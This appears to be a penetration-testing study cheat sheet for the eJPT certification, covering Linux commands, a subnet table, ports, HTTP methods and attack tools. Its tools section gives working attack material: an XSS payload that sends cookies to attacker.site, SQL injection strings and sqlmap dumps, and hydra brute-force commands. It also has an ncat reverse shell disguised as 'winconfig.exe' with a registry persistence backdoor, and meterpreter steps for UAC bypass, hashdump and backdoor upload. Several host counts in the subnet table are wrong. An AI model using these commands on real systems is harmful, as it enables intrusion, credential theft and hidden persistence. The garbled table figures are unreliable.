eJPT_QuickReference

Prévia do material em texto

Index
	INDEX	Description
	Linux Comands	Basic linux commands that should be known to get around the OS and work with files and software
	Network Mask Information	Network addressing information
	Standard Ports	Small list of well known ports
	Web Header Information	Web header formatting and syntax. Good for working with burp suite
	Tools	Software used in the eJPT along with basic syntax for the commands to execute
	Word Lists	Word list locations
	Locations	Just a few locations of files of interest
	Server	Syntax to run a simple http server not used in eJPT
LinuxCmds
	Index
	ifconfig		network configuration ip address
	route	route -n (for gateway)	routing and gateway
	ip route		routing
	ip neighbor		arp
	ping		check alive
	cp		copy
	rm		remove delete
	mkdir		create directory
	cat		read
	nano		text editor
	traceroute		trace connection
	ls		list contents of folder
	chmod	Chmod 777	change permissions
	mv		move
	file		check file type
	whoami		active user
	pwd		current working directory
	rmdir		delete directory
	netstat	netstat -tunp	check listening ports and connections
	wc -m		count length of file
	WHOIS
	nslookup
	arp
	uname -a
	ssh	ssh user@192.168.1.1
	telnet	telnet user@192.168.1.1
&"Liberation sans1,Regular"&A	
&"Liberation sans1,Regular"Page &P	
NetMask
	Index
	slash notation	net mask	hex	binary representation	number of hosts
	/0	0.0.0.0	0x00000000	00000000 00000000 00000000 00000000	4294967296		
2,147,483,646	 
	/1	128.0.0.0	0x80000000	10000000 00000000 00000000 00000000	2147483648		
1,073,741,822	 
	/2	192.0.0.0	0xc0000000	11000000 00000000 00000000 00000000	1073741824		
536,870,910	 
	/3	224.0.0.0	0xe0000000	11100000 00000000 00000000 00000000	536870912		
268,435,454	 
	/4	240.0.0.0	0xf0000000	11110000 00000000 00000000 00000000	268435456		
134,217,726	 
	/5	248.0.0.0	0xf8000000	11111000 00000000 00000000 00000000	134217728		
67,108,862	 
	/6	252.0.0.0	0xfc000000	11111100 00000000 00000000 00000000	67108864		
33,554,430	 
	/7	254.0.0.0	0xfe000000	11111110 00000000 00000000 00000000	33554432		
16,777,214	 
	/8	255.0.0.0	0xff000000	11111111 00000000 00000000 00000000	16777216		
8,388,606	 
	/9	255.128.0.0	0xff800000	11111111 10000000 00000000 00000000	8388608		
4,194,302	 
	/10	255.192.0.0	0xffc00000	11111111 11000000 00000000 00000000	4194304		
2,097,150	 
	/11	255.224.0.0	0xffe00000	11111111 11100000 00000000 00000000	2097152		
1,048,574	 
	/12	255.240.0.0	0xfff00000	11111111 11110000 00000000 00000000	1048576		
524,286	 
	/13	255.248.0.0	0xfff80000	11111111 11111000 00000000 00000000	524288		
262,142	 
	/14	255.252.0.0	0xfffc0000	11111111 11111100 00000000 00000000	262144		
131,070	 
	/15	255.254.0.0	0xfffe0000	11111111 11111110 00000000 00000000	131072		
65,534	 
	/16	255.255.0.0	0xffff0000	11111111 11111111 00000000 00000000	65536		
32,766	 
	/17	255.255.128.0	0xffff8000	11111111 11111111 10000000 00000000	32768		
16,382	 
	/18	255.255.192.0	0xffffc000	11111111 11111111 11000000 00000000	16384		
8,190	 
	/19	255.255.224.0	0xffffe000	11111111 11111111 11100000 00000000	8192		
4,094	 
	/20	255.255.240.0	0xfffff000	11111111 11111111 11110000 00000000	4096		
2,046	 
	/21	255.255.248.0	0xfffff800	11111111 11111111 11111000 00000000	2048		
1,022	 
	/22	255.255.252.0	0xfffffc00	11111111 11111111 11111100 00000000	1024		
510	 
	/23	255.255.254.0	0xfffffe00	11111111 11111111 11111110 00000000	512		
254	 
	/24	255.255.255.0	0xffffff00	11111111 11111111 11111111 00000000	256		
126	 
	/25	255.255.255.128	0xffffff80	11111111 11111111 11111111 10000000	128		
62	 
	/26	255.255.255.192	0xffffffc0	11111111 11111111 11111111 11000000	64		
30	 
	/27	255.255.255.224	0xffffffe0	11111111 11111111 11111111 11100000	32		
14	 
	/28	255.255.255.240	0xfffffff0	11111111 11111111 11111111 11110000	16		
6	 
	/29	255.255.255.248	0xfffffff8	11111111 11111111 11111111 11111000	8		
2	 
	/30	255.255.255.252	0xfffffffc	11111111 11111111 11111111 11111100	4		
0	 
	/31	255.255.255.254	0xfffffffe	11111111 11111111 11111111 11111110	2		
1	 
	/32	255.255.255.255	0xffffffff	11111111 11111111 11111111 11111111	1
&"Liberation sans1,Regular"&A	
&"Liberation sans1,Regular"Page &P	
Standard Ports
	Index
	22	SSH
	25	SMTP
	110	POP3
	115	SFTP
	143	IMAP
	80	HTTP
	443	HTTPS
	23	TELNET
	21	FTP
	3389	RDP
	3306	MYSQL
	1433	MS SQL
	137	NETBIOS	find work groups
	138	NETBIOS	list shares & machines
	139	NETBIOS	transit data
	53	DNS
&"Liberation sans1,Regular"&A	
&"Liberation sans1,Regular"Page &P	
webHeader
	Index
	Methods
		GET
		POST	add data to send on line after host:
		TRACE
		HEAD
		OPTIONS
		DELETE
		PUT	add data to send on line after host:
		GET / HTTP/1.1
		host: www.site.com
		POST /login.php HTTP/1.1
		host: www.site.com
		username=john&password=mypass
		PUT /path/to/destination HTTP/1.1
		host: www.site.com
		<put data>
		DELETE /path/to/destination HTTP/1.1
		host: www.site.com
		OPTIONS / HTTP/1.1
		host: www.site.com
		to exploit a PUT method you need toknow the size of the file you are sending. Use unix utility wc with -m paramter
		wc -m payload.php
		nc victim.site 80
		PUT /payload.php HTTP1.1
		host: victim.site
		Content-type: text/html
		Content-length: <wc output>
		4.3.8.4 PHP example
&"Liberation sans1,Regular"&A	
&"Liberation sans1,Regular"Page &P	
tools
	Index
	WireShark
		follow tcp stream
		File > export objects > smb/smb2 > save as
		View > name resolution > resolve physical addresses
		!arp and !http
		http.request.method == GET
		check arp requests for candidate router. Verify by looking at candidate router ip TCP traffic to see if it communicates on different networks
		tcp.stream eq 1
	firebug	plugin for firefox to present session data
	netcat	command line connect to web page	DOES NOT WORK WITH SSL
		nc -h	help
		nc -v www.ferrari.com 80	open connection to web page
		GET / HTTP/1.0	once connection is opened send http command and then make two blanks lines after
		GET / HTTP/1.1
		host: www.ferrari.com	using http/1.1 you must also put a host line and then put two blank lines
	openssl	command line connect to secure web page
		openssl s_client args
		openssl s_client -connect hack.me:443
			-debug	evaluate ssl cert
			-state	state of the handshake
		openssl s_client -connect hack.me:443 -quiet
		GET / HTTP/1.1
		host: hack.me	use two blank lines afterwards
	burp suite	Burp > restore defaults > all options
		check to turn on intercept responses
		repeater
		proxy
		target
		spider
	fping	use nmap instead
		fping -a -g 192.168.1.0/24 2> /dev/null
		-a	shows only alive
		-g	ping sweep instead of standard ping
		2> /dev/null	suppresses uneeded output
	nmap	scan network
		nmap -sn 192.168.1.0/24
		-sn	ping scan disable port scan
		-iL
		-A	enable all scans (OS, version, script, traceroute)
		-O	OS detection
		-sV	port scan with -sS as default
		-sS	SYN scan (Stealth)
		-iL	import list of hosts
		-Pn	skip ping, treat all hosts as online
		--osscan-limit	limit os detection to promising targets
		--osscan-guess	guess OS more aggressively
		-sT	tcp connect scan (not stealthy)
		-v	increase verbose level
		-p	specify ports to scan
		nmap -script=smb-enum-shares 192.168.102.151
		nmap -script=smb-enum-users 192.168.102.151
		nmap -script=smb-brute 192.168.102.151
		nmap –script=smb-check-vulns <ip address>	nmap –script=vuln <ip address>
	Nessus	scans for vulnerabilities
	dirbuster	directory enumaration
	XSS	injecting content onto a web page
		request headers
		cookies
		form inputs
		post parameter
		get parameter
		test with <i>, <pre>, <plaintext>
		<script>alert(‘XSS’)</script>
		<script>alert(document.cookie)</script>
		<script>	<script> var i = new Image(); i.src=”http://attacker.site/get.php?cookie=”+escape(document.cookie)</script>
		var i = new image();
		i.src=”http://attacker.site/log.php?q=”+document.cookie;
		</script>
		need attacker site to receive the cookie and then change cookie in your session
	SQLi	inject sql language to retrieve data
		' OR 1=1; – -
		' OR ‘a’=’a’; – -
		' OR ‘a’=’b’; – -
		this returns a true or false or may get you past authentication
		' OR substr(user(),1,1)=’a
		if returns true then the first letter is a and move to next
		' UNION SELECT null; – -
		' UNION SELECT null,null; – -
		this lets you know how many fields original query is trying to retrieve
		'UNION SELECT ‘id1’, ‘id2’; – -
		if returning fields, this will let you know which one is being returned
		'UNION SELECT user(), ‘id2’; – -
	SQLMAP	tool to exploit SQLi
		sqlmap -u <url> -p <injection parameter> [options]
		Sqlmap -u ‘http://victim.site/view.php?id=1141’ -p id –technique U
		attack id parameter with UNION SQLi technique
		sqlmap -u <url> --data=<POST string> -p <parameter> [options]
		to exploit POST parameter
		copy the post string from burp
		sqlmap -u http://10.124.211.96/login.php --data='username=a&password=b&submit=Login' -p username --level=2 -D awd -T accounts -C displayname,email,id,password --dump
		-b to get banner
		-v3 --fresh-queries	to get what string sqlmap used to exploit
		--users
		--dbs
	ncat	improved netcat
		set to listen on windows machine and make command line available
		rename ncat to winconfig.exe
		winconfig -l -p 5555 -e cmd.exe
		-l listen mode
		-p listen on port
		-e execute (cmd.exe)
		then connect from ncat on another machine
		ncat <ip address> <port>
		reverse connection
		put attacker machine in listen mode
		ncat -l -p 5555 -v
		-v verbose
		from victim machine
		winconfig -e cmd.exe <attacker ip> <port>
		to make persistant backdoor add registry settings
		HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
		new string value
		winconfig “c:\windows\system32\winconfig.exe” <ip address> <port> -e cmd.exe
	john the ripper	password cracker, brute force and dictionary
		unshadow passwd shadow > crackme
		john –list=formats
		/etc/passwd
		/etc/shadow
		unshadow passwd shadow > crackme
		john -incremental -users:<userlist> <file to crack>
		john -incremental -users:victim crackme
		john –show crackme
		john -wordlist<=custom wordlist file> <file to crack>
		-rules for mangling
		john -wordlist=mywordlist -users:victim crackme
		john -wordlist=mywordlist -rules -users:victim crackme
		john -wordlist=/usr/share/john/password.lst
		cat /root/.john/john.pot	lists hashes with cracked passwords
		john –show hashes	shows cracked accounts from the unshadowed hashes file
	ophrack	cracker for windows auth passwords
		load password file
		install rainbow tables from ophrack site
		click crack
	hydra	fast, parallelized, network auth cracker
		hydra -U rdp
		-U to get info about a specific module
		hydra -L users.txt -P pass.txt <service://server> <options>
		hydra -U http-post-form
		hydra crackme.site http-post-form “/login/php:usr=^USER^&pwd=^PASS^:invalid credentials” -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-15.txt
		'invalid credentials’ is the returned string when login fails
		-L /usr/share/ncrack/minimal.usr
		-P /usr/share/seclists/Passwords/rockyou-15.txt
		-f stop after first success
		-v verbose
		hydra -U ssh
		Hydra 192.168.102.143 ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -v
	nbtstat	display info about target	windows
		nbtstat -A <ip address>
		<00> workstation
		<20> file sharing is up
	NET VIEW	enumerate shares
		net view <target ip>
	nmblookup	display info about target (linux version of nbtstat)	linux tool installed with samba
		nmblookup -A <target ip>
	smbclient	Ftp-like client to access windows shares	can enumerate shares including admin shares
		smbclient -L //192.168.1.10 -N
		-L to look at what services
		//<ip address> requires //
		-N forces the tool to not ask for a password
		smbclient //<target ip>/IPC$ -N
		smbclient //<ip address> -N
		dir
		get file.txt /root/Desktop
	NET USE	test from windows shell for null session
		NET USE \\<target ip>\IPC$ ‘’/u:’’
		'’/u:’’ connect with empty username and password
		test only works with IPC$
	enum4linux	automated tools for null session attack
		nmap -sS -p 135,139,445 192.168.102.0/24enum4linux
		enum4linux -n 192.168.102.151
		look for <20> flag for sharing
		enum4linux -P 192.168.102.151
		look for password policy
		enum4linux -S 192.168.102.151
		enumerate shares
		enum4linux -s /usr/share/enum4linux/share-list.txt 192.168.102.151
		brute force share finder
		enum4linux -a 192.168.102.151
		run all commands
	samrdump.py
		cd /usr/share/doc/python-impacket-doc/examples
		python samrdump.py 192.168.102.151
	dsniff	collection of tools for network auditing
	arpspoof	one utility designed to intercept traffice	arp spoofing
		Echo 1 > /proc/sys/net/ipv4/ip_forward	turns linux box into router to relay traffic
		arpspoof -i <interface> -t <target> -r <host>
		interface is the nic
		run wireshark
		Ctrl-c to stop
	metasploit
		msfconsole
		show -h
		search <my search term>
		show exploits
		use exploit/windows/ftp/turboftp_port
		back	to back out
		use exploit/windows/ftp/turboftp_port
		show options
		set RHOST <ip address>
		show payloads
		set payload windows/meterpreter/reverse_tcp
		show options
		set LHOST <ip address>
		exploit
		msfupdate
	meterpreter
	I	ifconfig
		sysinfo
		background
		sessions -l
		session -i <session id>
		route
		getuid
		getsystem
		background
		search bypassuac
		use exploit/windows/local/bypassuac
		show options
		set session 1
		exploit
		getsystem
		hashdump
		background
		use post/windows/gather/hashdump
		show options
		set session 2
		exploit
		pwd
		cd
		ls
		download haxlogs.log /root/
		upload /root/backdoor.exe c:\\windows
		shell
		dir
		exit
		help
		ps
		getpid
		sysinfo
		pwd
		ls
		cd
		cat
		download
		getsystem
		run post/windows/gather/win_privs
		getuid
		background
		search uac
		use exploit/windows/ftp/turboftp_port
		show options
		set session 1
		exploit
		getsystem
		ps -U
		Migrate 616
		hashdump
		s4u_persistance
		use exploit/windows/local/s4u_persistance
		show options
		set session 1
		set trigger logon
		set payload windows/meterpreter/reverse_tcp
		set LHOST <ip address>
		set lport <port>
		show options
		exploit
		create listener
		use exploit/multi/handler
		set payload windows/meterpreter/reverse_tcp
		set LHOST <ip address>
		set lport <port>
		exploit
		 
&"Liberation sans1,Regular"&A	
&"Liberation sans1,Regular"Page &P	
wordlists
	Index
	password lists
	seclists	/usr/share/seclists/Passwords	Apt-get install seclists
		/usr/share/seclists/Passwords/rockyou-10.txt
		/usr/share/seclists/Passwords/rockyou-15.txt
	dirbuster	/usr/share/dirbuster/wordlists/directory-list-2.3-small.txt
		/usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-small.txt
	john	/usr/share/john/password.lst
	hydra/ncrack	/usr/share/ncrack/minimal.usr
&"Liberation sans1,Regular"&A	
&"Liberation sans1,Regular"Page &P	
locations
	Index
	/etc/network/interfaces	add static ip address
	/bin/bash	command interpreter bash shell
	/etc/crontab	list of scheduled jobs
&"Liberation sans1,Regular"&A	
&"Liberation sans1,Regular"Page &P	
Server
	Index
	HTTP
		go to folder you want give access
		python -m SimpleHTTPServer 80
		then you can get the files from there
		curl <ip address>/file.py -o <desitnation file name>
&"Liberation sans1,Regular"&A	
&"Liberation sans1,Regular"Page &P